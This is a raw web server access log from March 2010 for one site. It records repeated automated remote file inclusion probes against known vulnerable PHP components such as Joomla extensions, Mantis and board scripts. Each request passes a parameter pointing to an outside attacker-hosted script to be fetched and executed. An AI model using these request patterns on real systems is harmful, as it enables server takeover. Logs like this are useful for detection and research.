216.119.103.16 - - [05/Mar/2010:10:09:19 -0800] "GET /components/com_fabrik/libs/Blowfish/EBC.php?mosConfig.absolute.path=http://www.useplorraine.org//administrator/components/com_users/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
216.119.103.16 - - [05/Mar/2010:10:09:19 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/EBC.php?mosConfig.absolute.path=http://www.useplorraine.org//administrator/components/com_users/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:10:11 -0800] "GET /logs/access_100211.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:10:10:30 -0800] "GET /logs//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:10:10:30 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:10:10:30 -0800] "GET /include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:10:38 -0800] "GET /logs/access_100211.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
192.83.187.6 - - [05/Mar/2010:10:11:19 -0800] "GET /include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
192.83.187.6 - - [05/Mar/2010:10:11:19 -0800] "GET /logs//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
192.83.187.6 - - [05/Mar/2010:10:11:19 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:11:23 -0800] "GET /logs/access_100213.log//?_zb_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:11:23 -0800] "GET /logs//?_zb_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:11:23 -0800] "GET /?_zb_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:11:26 -0800] "GET /logs/access_100213.log//?_zb_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:11:26 -0800] "GET /logs//?_zb_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:11:26 -0800] "GET /?_zb_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.246 - - [05/Mar/2010:10:11:34 -0800] "GET /logs/access_100211.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.246 - - [05/Mar/2010:10:11:57 -0800] "GET /logs/access_100211.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:12:20 -0800] "GET /playing.php/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:12:20 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:12:20 -0800] "GET /logs/access_100126.log%20%20/playing.php/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:12:21 -0800] "GET /logs/access_100131.log%20%20/playing.php/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:10:12:29 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:10:12:29 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:10:12:29 -0800] "GET /logs/access_100218.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:10:12:33 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:10:12:33 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:10:12:33 -0800] "GET /logs/access_100218.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:10:12:33 -0800] "GET /logs/access_100211.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.170.245.35 - - [05/Mar/2010:10:13:31 -0800] "GET /logs/access_100221.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
95.170.245.35 - - [05/Mar/2010:10:13:31 -0800] "GET /xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
95.170.245.35 - - [05/Mar/2010:10:13:32 -0800] "GET /logs/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:13:47 -0800] "GET /logs/access_100218.log/includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:13:54 -0800] "GET /logs/access_100218.log/includes/ktedit/toolbar.php?dirDepth=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:10:14:12 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:10:14:12 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:10:14:13 -0800] "GET /logs/access_100218.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:14:18 -0800] "GET /logs/access_100214.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:10:14:29 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:10:14:30 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:10:14:30 -0800] "GET /logs/access_100218.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:14:31 -0800] "GET /logs/access_100219.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:14:31 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:14:31 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:14:33 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:14:33 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:14:34 -0800] "GET /logs/access_100219.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:15:15 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:15:15 -0800] "GET /logs/access_100219.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:10:15:15 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:10:15:32 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:10:15:44 -0800] "GET /logs/access_100211.log//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:10:15:55 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:10:16:02 -0800] "GET /logs/access_100211.log//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:10:16:45 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:10:16:55 -0800] "GET /logs/access_100211.log//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:17:55 -0800] "GET /logs/access_100224.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:17:55 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:17:55 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:17:58 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:17:58 -0800] "GET /logs/access_100212.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:17:58 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:18:03 -0800] "GET /logs/access_100215.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:18:08 -0800] "GET /logs/access_100225.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:10:18:08 -0800] "GET /logs/access_100217.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:10:18:08 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:10:18:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.130.87.10 - - [05/Mar/2010:10:18:16 -0800] "GET /logs/access_100221.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.130.87.10 - - [05/Mar/2010:10:18:17 -0800] "GET /xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.130.87.10 - - [05/Mar/2010:10:18:17 -0800] "GET /logs/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:10:18:18 -0800] "GET /logs/access_100203.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:18:27 -0800] "GET /logs/access_100205.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:18:27 -0800] "GET /logs/access_100205.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:18:28 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:18:28 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:18:28 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:18:28 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:18:31 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:18:31 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:18:31 -0800] "GET /logs/access_100212.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:18:35 -0800] "GET /logs/access_100215.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:19:29 -0800] "GET /logs/access_100224.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:19:29 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:19:29 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:19:57 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:19:58 -0800] "GET /logs/access_100203.log%20%20//bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:19:58 -0800] "GET /bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:20:12 -0800] "GET /logs/access_100225.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:20:26 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:20:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:20:26 -0800] "GET /logs/access_100217.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:20:36 -0800] "GET /logs/access_100203.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:45 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:45 -0800] "GET /logs/access_100214.log%20%20/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:47 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:47 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:47 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:50 -0800] "GET /logs/access_100214.log%20%20/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:50 -0800] "GET /logs/access_100206.log%20%20//bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:55 -0800] "GET /logs/access_100205.log%20%20/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:59 -0800] "GET /logs/access_100205.log%20%20/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:59 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:20:59 -0800] "GET /logs/access_100203.log//bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:21:01 -0800] "GET /bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:21:02 -0800] "GET /logs/access_100220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.10.155.226 - - [05/Mar/2010:10:21:03 -0800] "GET /logs/access_100220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:12 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:13 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:13 -0800] "GET /logs/access_100224.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:31 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:31 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:31 -0800] "GET /logs/access_100224.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:31 -0800] "GET /logs/access_100225.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:21:31 -0800] "GET /logs/access_100225.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:21:35 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:21:35 -0800] "GET /logs/access_100217.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:21:35 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:10:21:54 -0800] "GET /logs/access_100218.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
